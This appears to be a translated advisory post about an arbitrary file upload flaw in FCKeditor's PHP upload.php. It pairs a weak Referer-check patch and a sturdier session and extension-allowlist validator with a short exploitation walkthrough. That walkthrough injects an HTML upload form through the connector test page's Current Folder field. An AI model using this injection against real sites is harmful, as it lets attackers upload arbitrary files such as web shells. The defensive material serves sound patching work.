Vulnerable file: editors/fckeditor/editor/filemanager/upload/php/upload.php
The fix circulating online is as follows.
Fix: remove the FCK editor and use a different editor,
or open the file editors/fckeditor/editor/filemanager/upload/php/upload.php
and, below
require('config.php');
require('util.php');
add the following code:
// Block submissions from outside the site
function outsidepost()
{
    $servername = $_SERVER['SERVER_NAME'];
    // Referer is a request header sent by the client; @ hides the notice when it is absent
    $sub_from = @$_SERVER['HTTP_REFERER'];
    $sub_len = strlen($servername);
    // Skip the 7 characters of "http://" and take as many characters as the server name has
    $checkfrom = substr($sub_from, 7, $sub_len);
    if ($checkfrom != $servername) {
        echo("you don't outsidepost!");
        exit;
    }
}
outsidepost();
This blocks submissions from outside the site, but it does not block submissions from inside it.
How it is exploited:
1. Open editors/fckeditor/editor/filemanager/browser/default/connectors/test.html
2. In the Current Folder box, enter
<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>
Then click Get Folders and Files; an upload form appears, and files of any type can be uploaded.
PS: If the editors directory and the upload folder are set to return 403, 500 or 404, the exploit does not work.
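
The Referer check above only looks at where the request claims to come from, so a form served from the site itself passes it, and it never looks at the file being uploaded. The following is an added example, not code from the original post or from FCKeditor, of a check that does not depend on the Referer: it requires a logged-in session and an allowlisted extension. The function name, the 'is_editor' session key and the extension list are assumptions.

```php
<?php
// Added example, not FCKeditor code. The 'is_editor' session key and the
// extension allowlist are assumptions; adapt them to the site's own login.
const ALLOWED_EXT = ['jpg', 'jpeg', 'png', 'gif', 'swf', 'flv', 'mp3'];

// Returns null when the upload may proceed, otherwise the reason it is refused.
function upload_rejection_reason(array $session, array $file): ?string
{
    // Authorization comes from server-side session state, not a request header.
    if (empty($session['is_editor'])) {
        return 'not logged in as an editor';
    }
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return 'upload error';
    }
    // Reduce the client-supplied name to a bare file name.
    $name = basename(str_replace('\\', '/', (string)($file['name'] ?? '')));
    if ($name === '' || strpos($name, "\0") !== false) {
        return 'bad file name';
    }
    // Every dot-separated suffix must be on the allowlist, not only the last.
    $parts = explode('.', strtolower($name));
    array_shift($parts);
    if ($parts === []) {
        return 'no extension';
    }
    foreach ($parts as $ext) {
        if (!in_array($ext, ALLOWED_EXT, true)) {
            return "extension .$ext not allowed";
        }
    }
    return null;
}

// Constructed sample inputs: [session, file entry as found in $_FILES].
$ok = ['error' => UPLOAD_ERR_OK];
$cases = [
    [[], $ok + ['name' => 'clip.flv']],
    [['is_editor' => true], $ok + ['name' => 'clip.flv']],
    [['is_editor' => true], $ok + ['name' => 'page.php']],
    [['is_editor' => true], $ok + ['name' => 'page.php.jpg']],
];
foreach ($cases as [$session, $file]) {
    $why = upload_rejection_reason($session, $file);
    echo $file['name'], ' => ', $why ?? 'accepted', "\n";
}
```

In upload.php the function would be called with $_SESSION (after session_start()) and $_FILES['NewFile'], the field name used by the upload form, before the file is saved; a non-null result should end the request.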